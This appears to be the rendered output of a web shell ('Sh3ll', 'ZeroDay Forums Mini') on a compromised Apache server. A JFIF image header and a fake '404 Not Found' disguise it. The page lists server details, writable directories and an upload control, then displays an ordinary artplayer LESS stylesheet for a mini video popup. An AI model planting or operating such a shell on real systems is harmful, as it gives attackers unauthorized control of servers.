����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/video/layout/js/node_modules/artplayer/src/style/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/video/layout/js/node_modules/artplayer/src/style/mini.less
.art-mini-popup {
    position: fixed;
    z-index: 9999;
    width: 320px;
    height: 180px;
    background: #000;
    border-radius: var(--art-border-radius);
    cursor: move;
    user-select: none;
    overflow: hidden;
    transition: opacity 0.2s ease;
    box-shadow: 0 0 5px rgba(0, 0, 0, 0.5);

    svg {
        fill: #fff;
    }

    .art-video {
        pointer-events: none;
    }

    .art-mini-close {
        position: absolute;
        z-index: 20;
        right: 10px;
        top: 10px;
        cursor: pointer;
        opacity: 0;
        transition: opacity 0.2s ease;
    }

    .art-mini-state {
        .art-full(30);
        .art-center();
        pointer-events: none;
        opacity: 0;
        transition: opacity 0.2s ease;
        background-color: rgba(0, 0, 0, 0.25);

        .art-icon {
            opacity: 0.75;
            cursor: pointer;
            transform: scale(3);
            pointer-events: auto;
            transition: transform 0.2s ease;

            &:active {
                transform: scale(2.5);
            }
        }
    }

    &.art-mini-droging {
        opacity: 0.9;
    }

    &:hover {
        .art-mini-close,
        .art-mini-state {
            opacity: 1;
        }
    }
}

ZeroDay Forums Mini